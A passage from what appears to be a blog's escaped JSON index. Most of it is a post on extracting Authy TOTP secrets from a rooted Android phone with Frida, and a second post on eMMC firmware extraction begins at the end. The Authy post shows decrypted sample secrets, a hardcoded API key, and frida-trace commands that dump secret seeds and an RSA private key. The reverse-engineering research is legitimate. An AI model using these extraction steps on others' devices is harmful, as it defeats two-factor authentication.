Co:jdoe@example.com\u0026#34;,\u0026#34;timestamp\u0026#34;:1720384369,\u0026#34;salt\u0026#34;:\u0026#34;smWX7wlzBB6xr3H1evpcd721KcZhpkvd\u0026#34;,\u0026#34;upload_state\u0026#34;:\u0026#34;uploaded\u0026#34;,\u0026#34;hidden\u0026#34;:false,\u0026#34;id\u0026#34;:\u0026#34;1720731300\u0026#34;,\u0026#34;isNew\u0026#34;:false,\u0026#34;name\u0026#34;:\u0026#34;ACME Co: jdoe@example.com\u0026#34;}] \u0026lt;/string\u0026gt; \u0026lt;/map\u0026gt; Within the XML is a string with the name com.authy.storage.tokens.authenticator.key. This contains an array list of JSON objects. Here is the same data just formatted better:\n[{ \u0026#34;accountType\u0026#34;: \u0026#34;authenticator\u0026#34;, \u0026#34;decryptedSecret\u0026#34;: \u0026#34;wjjgnyerozgx3reoyxzukommt4\u0026#34;, \u0026#34;digits\u0026#34;: 6, \u0026#34;encryptedSecret\u0026#34;: \u0026#34;vk6L0v2pw696prZJ9avJxt9hhF4GHXNB/bNx8Kwi/bU\\u003d\u0026#34;, \u0026#34;key_derivation_iterations\u0026#34;: 100000, \u0026#34;logo\u0026#34;: \u0026#34;Example\u0026#34;, \u0026#34;originalIssuer\u0026#34;: \u0026#34;Example\u0026#34;, \u0026#34;originalName\u0026#34;: \u0026#34;Example Co:lol@example.com\u0026#34;, \u0026#34;timestamp\u0026#34;: 1720384210, \u0026#34;salt\u0026#34;: \u0026#34;raL6WCaojHWWxZndFRlFmbshXpce2jM6\u0026#34;, \u0026#34;upload_state\u0026#34;: \u0026#34;uploaded\u0026#34;, \u0026#34;hidden\u0026#34;: false, \u0026#34;id\u0026#34;: \u0026#34;1720384210\u0026#34;, \u0026#34;isNew\u0026#34;: false, \u0026#34;name\u0026#34;: \u0026#34;Example Co: lol@example.com\u0026#34; }, { \u0026#34;accountType\u0026#34;: \u0026#34;authenticator\u0026#34;, \u0026#34;decryptedSecret\u0026#34;: \u0026#34;AUSJD7LZ5H27TAC7NW2IJMATDMVDUPUG\u0026#34;, \u0026#34;digits\u0026#34;: 6, \u0026#34;encryptedSecret\u0026#34;: \u0026#34;AKQz/j3PN3La3xwPL8ou3AHW9kMs9CpVgOU7QjaMeswxRlqYaLqkDYutUdJysXX2\u0026#34;, \u0026#34;key_derivation_iterations\u0026#34;: 100000, \u0026#34;logo\u0026#34;: \u0026#34;ACME Co\u0026#34;, 
\u0026#34;originalIssuer\u0026#34;: \u0026#34;ACME Co\u0026#34;, \u0026#34;originalName\u0026#34;: \u0026#34;ACME Co:jdoe@example.com\u0026#34;, \u0026#34;timestamp\u0026#34;: 1720384369, \u0026#34;salt\u0026#34;: \u0026#34;smWX7wlzBB6xr3H1evpcd721KcZhpkvd\u0026#34;, \u0026#34;upload_state\u0026#34;: \u0026#34;uploaded\u0026#34;, \u0026#34;hidden\u0026#34;: false, \u0026#34;id\u0026#34;: \u0026#34;1720731300\u0026#34;, \u0026#34;isNew\u0026#34;: false, \u0026#34;name\u0026#34;: \u0026#34;ACME Co: jdoe@example.com\u0026#34; }] The decryptedSecret value is your plaintext TOTP secret. To confirm it is actually valid, you could use something like an online TOTP token generator (only for sample accounts) to see if it matches the code in your Authy app.\nFor anything sensitive, I would instead use an offline script that\u0026rsquo;s open source.\nKinda like the one in this post :)\nAuthy TOTP secret extract tool I\u0026rsquo;ve made a simple tool that is capable of extracting TOTP secrets from the Android Authy app. You will need a rooted device and a Frida server running. There may be other ways (without root access), like patching the Android app, but they were not explored here.\nAnyway, the script does the following:\ntries to connect to a USB device via the Frida module spawns com.authy.authy and then attaches to the process runs a Frida script to read the com.authy.storage.tokens.authenticator.xml file parses the file contents and extracts the relevant TOTP info generates QR codes based on the extracted info and prints them Requirements You need to install the following Python modules:\npip3 install frida pyotp qrcode Download It is available on my GitHub page here.\nAlternative Instead of using the script above or setting up a Frida server, one easier way (if you have a rooted device) is to install the Aegis app and then import the above XML file, which it supports.\nThe next few sections go into details of how Authy generates OTPs for the URL parameters in each of its API endpoints.
It also covers some Java method tracing with frida-trace.\nRuntime fun with Frida Now that I have what I need to create an offline backup, I could stop right there. However, I wanted to explore the .apk a bit and also figure out how the OTP tokens are generated. These are supplied in various HTTP requests after account registration.\nSensitive Java operations WithSecureLabs have a great collection of Frida scripts on their GitHub page. I used several, such as tracer-keystore.js and tracer-secretkeyfactory.js. The first hooks the Android secure keystore (https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-keystore.js); see also https://labs.withsecure.com/publications/how-secure-is-your-android-keystore-authentication ✘ naz@Nazs-MacBook-Air ~/Mobile/Android/Frida $ frida -U -l tracer-keystore.js -f com.authy.authy ____ / _ | Frida 16.1.4 - A world-class dynamic instrumentation toolkit | (_| | \u0026gt; _ | Commands: /_/ |_| help -\u0026gt; Displays the help system . . . . object? -\u0026gt; Display information about \u0026#39;object\u0026#39; . . . . exit/quit -\u0026gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Pixel 3a (id=9C6AY1MMQX) Spawning `com.authy.authy`... KeyStore hooks loaded! Spawned `com.authy.authy`. Resuming main thread!
[Pixel 3a::com.authy.authy ]-\u0026gt; [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;(null)\u0026#39;, inputSteam: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getInstance()]: type: BKS [Keystore.load(LoadStoreParameter)]: keystoreType: BKS, param: null [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;changeit\u0026#39;, inputSteam: android.content.res.AssetManager$AssetInputStream@ec77830 [Keystore.getInstance()]: type: BKS [Keystore.load(InputStream, char[])]: keystoreType: BKS, password: \u0026#39;(null)\u0026#39;, inputSteam: null [Keystore.getInstance()]: type: BKS [Keystore.load(LoadStoreParameter)]: keystoreType: BKS, param: null [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getKey()]: alias: sig1810030805, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enc1810030805, password: \u0026#39;(null)\u0026#39; [Keystore.getInstance()]: type: AndroidKeyStore [Keystore.load(LoadStoreParameter)]: keystoreType: AndroidKeyStore, param: null [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Keystore.getKey()]: alias: enpt, password: \u0026#39;(null)\u0026#39; [Pixel 3a::com.authy.authy ]-\u0026gt; [Pixel 3a::com.authy.authy ]-\u0026gt; exit 
Nothing too interesting, let\u0026rsquo;s move on to the tracer-secretkeyfactory.js script.\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida $ frida -U -l tracer-secretkeyfactory.js -f com.authy.authy ____ / _ | Frida 16.1.4 - A world-class dynamic instrumentation toolkit | (_| | \u0026gt; _ | Commands: /_/ |_| help -\u0026gt; Displays the help system . . . . object? -\u0026gt; Display information about \u0026#39;object\u0026#39; . . . . exit/quit -\u0026gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Pixel 3a (id=9C6AY1MMQX) Spawning `com.authy.authy`... SecretKeyFactory hooks loaded! Spawned `com.authy.authy`. Resuming main thread! [Pixel 3a::com.authy.authy ]-\u0026gt; [PBEKeySpec.PBEKeySpec3()]: pass: %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ iter: 100 keyLength: 256 salt: Offset 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 00000000 C2 48 C6 29 AF 1F E0 A8 C4 6B 95 66 80 64 C1 D2 .H.).....k.f.d.. 00000010 95 2A 9E 91 D2 07 BC 0C C3 C5 D5 84 C2 F7 55 3A .*............U: [PBEKeySpec.PBEKeySpec3()]: pass: %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ iter: 100 keyLength: 256 ... The output has been truncated to save space, but a pass field with the value %sD=#4utHy.\u0026gt;{dwp\u0026amp;@ is present. If you look closer, you\u0026rsquo;ll notice 4utHy almost resembles the string Authy. I\u0026rsquo;m not quite sure how it\u0026rsquo;s used or for what purpose.\nTracing Java Classes I used the jadx-gui Java decompiler to inspect the app; luckily it wasn\u0026rsquo;t too heavily obfuscated. This let me find classes and functions matching specific keywords taken from intercepted traffic.\nKeywords like opt1, secret, backup_key and others can be found. These were also in the HTTP requests intercepted earlier. The Java package com.authy.authy.api.requestInterceptors is responsible for constructing the requests that are sent to the backend servers.
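Going back to the PBEKeySpec trace for a moment: a spec with a password, a 32-byte salt, 100 iterations, and a 256-bit key length is normally consumed by a PBKDF2 SecretKeyFactory. Assuming the factory was PBKDF2WithHmacSHA1 (the trace does not show the algorithm string, so the PRF is a guess), the equivalent derivation in Python would be:

```python
import hashlib


def derive_pbe_key(password: str, salt: bytes,
                   iterations: int = 100, key_bits: int = 256) -> bytes:
    """PBKDF2 with the parameters seen in the PBEKeySpec trace.
    The PRF (HMAC-SHA1) is an assumption; the app may use another hash."""
    return hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt,
                               iterations, dklen=key_bits // 8)
```

Whatever the exact PRF turns out to be, 100 iterations is a very low work factor by modern password-hashing standards.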
The class CompleteParamsRequestInterceptor makes up most of the package.\nHere\u0026rsquo;s what the code looks like within jadx-gui:\nI noticed that the com.authy.authy.models.MasterApp class made references to com.authy.authy.models.AuthyApp, which contained functions such as getOtp(), isConfigured(), validateAndLock() and others. I was mainly curious about the getOtp() function because I wanted to know how the OTP gets generated.\nstatic api_key value The api_key keyword can be found in a class called com.authy.authy.api.AuthyAPI. It appears to be statically set to 37b312a3d682b823c439522e1fd31c82. This could change between app versions, although they have been using this value since older versions.\nfrida-trace java classes With some key class names, I then used frida-trace with the -j option to search for any usage of the com.authy.authy.models.AuthyApp class during app runtime. The -f parameter is what starts or spawns the app.\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.AuthyApp!*\u0026#39; -f com.authy.authy Instrumenting...
AuthyApp.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/_init.js\u0026#34; AuthyApp.addExtraDataBeforeSave: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/addExtraDataBeforeSave.js\u0026#34; AuthyApp.decrypt: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/decrypt.js\u0026#34; AuthyApp.getConfigId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getConfigId.js\u0026#34; AuthyApp.getInternalId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getInternalId.js\u0026#34; AuthyApp.getLogoImage: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getLogoImage.js\u0026#34; AuthyApp.getMenuImage: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getMenuImage.js\u0026#34; AuthyApp.getOtp: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getOtp.js\u0026#34; AuthyApp.getSecretKey: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getSecretKey.js\u0026#34; AuthyApp.getTokenIdLabel: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getTokenIdLabel.js\u0026#34; AuthyApp.getTokenLabel: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getTokenLabel.js\u0026#34; AuthyApp.getUniqueId: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/getUniqueId.js\u0026#34; 
AuthyApp.isConfigured: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/isConfigured.js\u0026#34; AuthyApp.setSecretKey: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/setSecretKey.js\u0026#34; AuthyApp.toBluetoothInfo: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/toBluetoothInfo.js\u0026#34; AuthyApp.updateConfig: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/updateConfig.js\u0026#34; AuthyApp.validateAndLock: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol/__handlers__/com.authy.authy.models.AuthyApp/validateAndLock.js\u0026#34; Started tracing 17 functions. Press Ctrl+C to stop. /* TID 0x1763 */ 578 ms AuthyApp.$init() /* TID 0x174a */ 811 ms AuthyApp.isConfigured() 823 ms \u0026lt;= true 844 ms AuthyApp.getSecretKey() 846 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x17e3 */ 1020 ms AuthyApp.getSecretKey() 1025 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x183e */ 1420 ms AuthyApp.getSecretKey() 1423 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x1721 */ 1520 ms AuthyApp.getSecretKey() 1524 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; 1642 ms AuthyApp.getSecretKey() 1644 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; 1764 ms AuthyApp.getSecretKey() 1767 ms \u0026lt;= \u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34; /* TID 0x174a */ 1772 ms AuthyApp.isConfigured() 1777 ms \u0026lt;= true The AuthyApp.getSecretKey() method is called multiple times, when the app starts. The value returned is 227aa6ce3689bfdbdc4afd0e5376965a. 
I later realised this is the secret seed used for generating the OTP tokens.\nDoing the same thing on a different class, com.authy.authy.models.otp.OtpGenerator, shows that the above seed is used as the first parameter of a function called OtpGenerator.generateConsecutiveOTPS.\nHere are the calls:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.otp.OtpGenerator!*\u0026#39; -f com.authy.authy Instrumenting... OtpGenerator.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/_init.js\u0026#34; OtpGenerator.getInstance: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/getInstance.js\u0026#34; OtpGenerator.generateConsecutiveOTPS: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/generateConsecutiveOTPS.js\u0026#34; OtpGenerator.generateOTP: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/generateOTP.js\u0026#34; OtpGenerator.getMovingFactor: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/getMovingFactor.js\u0026#34; OtpGenerator.hashToHexString: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/hashToHexString.js\u0026#34; OtpGenerator.hmac_sha1: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.otp.OtpGenerator/hmac_sha1.js\u0026#34; Started tracing 7 functions. Press Ctrl+C to stop.
/* TID 0x5004 */ 860 ms OtpGenerator.generateConsecutiveOTPS(\u0026#34;227aa6ce3689bfdbdc4afd0e5376965a\u0026#34;, 3, 7) 860 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,49], 7) 862 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,49]) 866 ms | | \u0026lt;= [-64,-19,-98,-36,56,18,-28,-119,-51,93,10,-43,32,-95,-23,120,78,-10,125,-11] 867 ms | | OtpGenerator.hashToHexString([-64,-19,-98,-36,56,18,-28,-119,-51,93,10,-43,32,-95,-23,120,78,-10,125,-11]) 867 ms | | \u0026lt;= \u0026#34;c0ed9edc3812e489cd5d0ad520a1e9784ef67df5\u0026#34; 867 ms | \u0026lt;= \u0026#34;9313298\u0026#34; 867 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,50], 7) 868 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,50]) 869 ms | | \u0026lt;= [57,61,104,-108,31,-110,111,-29,69,80,-32,17,39,-50,-24,-40,70,82,62,-2] 869 ms | | OtpGenerator.hashToHexString([57,61,104,-108,31,-110,111,-29,69,80,-32,17,39,-50,-24,-40,70,82,62,-2]) 870 ms | | \u0026lt;= \u0026#34;393d68941f926fe34550e01127cee8d846523efe\u0026#34; 870 ms | \u0026lt;= \u0026#34;8310670\u0026#34; 870 ms | OtpGenerator.generateOTP([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,51], 7) 872 ms | | OtpGenerator.hmac_sha1([56,99,50,100,56,101,49,55,49,57,101,100,100,50,57,49,54,48,49,55,102,98,101,99,56,48,49,55,57,55,49,55], [49,55,50,48,55,50,54,52,51]) 873 ms | | \u0026lt;= [47,39,-65,43,-21,-27,-114,-30,-7,-114,-79,-93,35,119,-64,-46,121,113,-82,34] 874 ms | | 
OtpGenerator.hashToHexString([47,39,-65,43,-21,-27,-114,-30,-7,-114,-79,-93,35,119,-64,-46,121,113,-82,34]) 875 ms | | \u0026lt;= \u0026#34;2f27bf2bebe58ee2f98eb1a32377c0d27971ae22\u0026#34; 875 ms | \u0026lt;= \u0026#34;1677502\u0026#34; 878 ms \u0026lt;= \u0026#34;\u0026lt;instance: java.util.ArrayList\u0026gt;\u0026#34; As shown above, three calls to OtpGenerator.generateOTP are made, which return the following OTP tokens: 9313298, 8310670, 1677502. The caller, OtpGenerator.generateConsecutiveOTPS, can be seen taking three input parameters:\n227aa6ce3689bfdbdc4afd0e5376965a (device secret seed) 3 (number of OTP tokens) 7 (number of OTP digits) All three OTP tokens are different because each inner call uses the next moving factor (note the second argument to generateOTP incrementing by one between calls), i.e. the tokens are generated for consecutive time steps. Back in 2021, a researcher reverse engineered the OTP generation of Authy, which is available here.\nA brief look at the com.authy.authy.models.movingFactor.MovingFactor class:\nnaz@Nazs-MacBook-Air ~/Mobile/Android/Frida/lol2 $ frida-trace -U -j \u0026#39;com.authy.authy.models.movingFactor.MovingFactor*!*\u0026#39; -f com.authy.authy Instrumenting...
MovingFactor$Corrector.$init: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/_init.js\u0026#34; MovingFactor$Corrector.getLocalTime: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getLocalTime.js\u0026#34; MovingFactor$Corrector.getTimeInServerUnits: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getTimeInServerUnits.js\u0026#34; MovingFactor$Corrector.getTimeInServerUnits$default: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getTimeInServerUnits_default.js\u0026#34; MovingFactor$Corrector.getCurrentTime: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getCurrentTime.js\u0026#34; MovingFactor$Corrector.getCurrentTimeInServerUnits: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getCurrentTimeInServerUnits.js\u0026#34; MovingFactor$Corrector.getMovingFactor: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/getMovingFactor.js\u0026#34; MovingFactor$Corrector.isTimeCorrectionSignificant: Auto-generated handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/isTimeCorrectionSignificant.js\u0026#34; MovingFactor$Corrector.updateMovingFactorCorrection: Auto-generated handler at 
\u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor_Corrector/updateMovingFactorCorrection.js\u0026#34; MovingFactor.$init: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/_init.js\u0026#34; MovingFactor.access$getMovingFactorCorrection$cp: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/access_getMovingFactorCorrection_cp.js\u0026#34; MovingFactor.access$setMovingFactorCorrection$cp: Loaded handler at \u0026#34;/Users/naz/Mobile/Android/Frida/lol2/__handlers__/com.authy.authy.models.movingFactor.MovingFactor/access_setMovingFactorCorrection_cp.js\u0026#34; Started tracing 12 functions. Press Ctrl+C to stop. /* TID 0x60c7 */ 426 ms MovingFactor$Corrector.$init(null) /* TID 0x6118 */ 1193 ms MovingFactor$Corrector.updateMovingFactorCorrection(\u0026#34;1720728191000\u0026#34;) 1193 ms MovingFactor$Corrector.getMovingFactor() 1193 ms \u0026lt;= \u0026#34;-754\u0026#34; 1283 ms MovingFactor$Corrector.updateMovingFactorCorrection(\u0026#34;1720728191000\u0026#34;) 1284 ms MovingFactor$Corrector.getMovingFactor() 1284 ms \u0026lt;= \u0026#34;-844\u0026#34; /* TID 0x60b1 */ 65472 ms MovingFactor$Corrector.getCurrentTime() 65472 ms \u0026lt;= \u0026#34;1720728255189\u0026#34; 65475 ms MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 65477 ms \u0026lt;= \u0026#34;1720728255\u0026#34; 81078 ms MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 81079 ms \u0026lt;= \u0026#34;1720728270\u0026#34; 81083 ms MovingFactor$Corrector.getCurrentTime() 81083 ms \u0026lt;= \u0026#34;1720728270800\u0026#34; 112055 ms 
MovingFactor$Corrector.getCurrentTime(\u0026#34;\u0026lt;instance: java.util.concurrent.TimeUnit, $className: java.util.concurrent.TimeUnit$4\u0026gt;\u0026#34;) 112056 ms \u0026lt;= \u0026#34;1720728301\u0026#34; 112058 ms MovingFactor$Corrector.getCurrentTime() 112059 ms \u0026lt;= \u0026#34;1720728301775\u0026#34; Dumping RSA private key The following trace dumps the device/account RSA private key and secret seed, among other calls:\nfrida-trace -U -f com.authy.authy -j \u0026#39;com.authy.authy.util.CryptoHelper*!*/i\u0026#39; Changing device time I thought I would try messing about with the device time to see how the app would handle it. For a brief moment the TOTP tokens were the same every 30 seconds, but after a while the app was smart enough to sync time with a backend server and regenerate tokens from that time instead.\nHere\u0026rsquo;s a Frida script I found that changes the device time to Thu Dec 31 2020 16:00:00:\nJava.perform(() =\u0026gt; { // This function will be called every time System.currentTimeMillis() is called function hook() { // Return the Unix timestamp for \u0026#34;Thu Dec 31 2020 16:00:00\u0026#34; return 1609459200000; } // Create a Frida hook on the System.currentTimeMillis() method var System = Java.use(\u0026#39;java.lang.System\u0026#39;); System.currentTimeMillis.implementation = hook; }); You\u0026rsquo;ll notice your Authy TOTP tokens remain the same, at least for a bit.\nSummary Authy makes it annoying to create offline backups, only allowing uploads to their own servers. However, with a bit of trial and error, we can export our 2FA secrets with the help of Frida and a rooted Android device.\nBut before you delete your Authy account: there have been reports from users that deleting an Authy account invalidates all 2FA tokens that use it as a backend. This includes Twitch, SendGrid, xxxx, and others. Deletion also only takes effect after a one-month delay.
Read source.\nThis would make sense; however, it\u0026rsquo;s not clearly documented to users.\n","permalink":"https://markuta.com/export-authy-backups/","title":"Creating offline Authy backups"},{"categories":null,"contents":"This is the second part of Hacking Amazon\u0026rsquo;s eero 6 device, which covers reading and extracting firmware data directly from an eMMC flash chip, after the chip had been desoldered (not by me) from the device. I also share the equipment I bought during this project, including what didn\u0026rsquo;t work and what did.\nYou can skip to this section on modifying a BGA159 chip reader.\nThe firmware on the eMMC at the time was version v7.1.1-16, released on X. This has most likely changed by now, but it should still represent the core layout and structure of a device\u0026rsquo;s filesystem.\nThe first part of the blog can be found at: https://markuta.com/eero-6-hacking-part-1/\nWhat this blog is about? Non-destructive Before committing to removing the eMMC flash chip from the device, I tried a few non-destructive techniques. None of them worked for me, but here are a few things I tried:\nrecovery mode boot interrupting boot via UART tracing lines around eMMC faulting device boot-up analysing device test points I had no luck with the above, and it was at this point that I decided it was time to desolder the chip, while hoping the firmware was not encrypted.\nChip removal I was tempted to buy a hot air station, but a decent one costs about £200 I decided to take the device to a mobile repair shop, where they desoldered it for £20 so now I\u0026rsquo;ve got an eMMC BGA153 chip but no easy way to read it tried a few super cheap ways with the tools I had on hand (didn\u0026rsquo;t work out) ended up buying a cheap BGA153 adapter + some other devices eMMC and SD interfaces In a nutshell, microSD, SD, MMC, and eMMC all work very similarly but have slight differences.
eMMC stands for Embedded MultiMedia Card, and is made up of NAND flash storage plus a flash controller, which sits between the NAND and the host processor. A technical overview can be found here.\nYou should also read this excellent article by (riverloopsecurity) about their eMMC research, which includes firmware extraction. Or this Blackhat 2017 talk by Amir Etemadieh.\nA few failed attempts I have a theory that the reason most attempts failed was that I was using the eMMC in 1-bit mode, meaning only one data pin is connected. It could also be that the adapter I was using did not support this mode (very doubtful). The other, more realistic, reason could be my soldering contact points and/or missing resistors.\ntracing lines There were several trace lines between the eMMC chip and the main CPU. One of the things I tried was scratching away pieces of the PCB to reveal the copper lines, and then soldering a very fine copper wire to see if I could use a logic analyser. This didn\u0026rsquo;t work, as it was difficult to identify a CLK signal and/or other signals.\nNote: I didn\u0026rsquo;t take a photo before the eMMC was removed.\ndead bugging used 0.1mm copper wire with a thin layer of enamel used a breakout board with white tack for the chip sacrificed a microSD adapter probe tool The idea behind the tool is pretty good; the problem I found was that it is best suited for microSD card recovery and bigger PCBs, rather than fine BGA pads. The test probes (although they were almost like needles) would slip off the pads and are quite awkward to work with.\neMMC to microSD adapter I also tried using a cheap microSD to SD adapter, which was then plugged into a microSD reader. I used three SD card readers: a Transcend SD USB adapter, a UGreen multi-tool USB-C adapter, and an old laptop with an SD card slot; all of them failed.\nlow-powered eMMC to SD adapter I really thought this device would work. But it didn\u0026rsquo;t.
I thought it was likely to do with my soldering, although I did triple-check the contact points before trying to read the chip. Apparently, others have also had issues, e.g. link\nShopping on Aliexpress I began to lose patience, since I wasn\u0026rsquo;t getting anywhere with \u0026ldquo;hacky\u0026rdquo; solutions. So I decided to go on Aliexpress and buy a BGA153 adapter to read the eMMC chip, without needing to manually solder wires to tiny BGA pads.\nAliexpress basically has anything you want when it comes to electronics, from NAND flash chips to Wi-Fi routers, JTAG/SPI programmers, and even LTE base stations, and much more. Orders to the UK normally take around two weeks to arrive.\nI searched for keywords like eMMC reader, eMMC to SD adapter, BGA153 adapter and others to see what\u0026rsquo;s available. Here were some of the results:\nAnd yes, somebody actually paid for the \u0026ldquo;reasonably\u0026rdquo; priced £1,007.18 one. Most of the devices were very expensive, and I wasn\u0026rsquo;t prepared to spend that much on a single project. The blog post mentioned earlier used an AllSocket adapter which comes with an SD interface; however, it costs upwards of £90.\nI purchased the cheapest (£35) eMMC BGA153 adapter that I could find. This also meant I had to purchase another device to convert the signals into either a USB or an SD interface, because the cheap adapters don\u0026rsquo;t have a 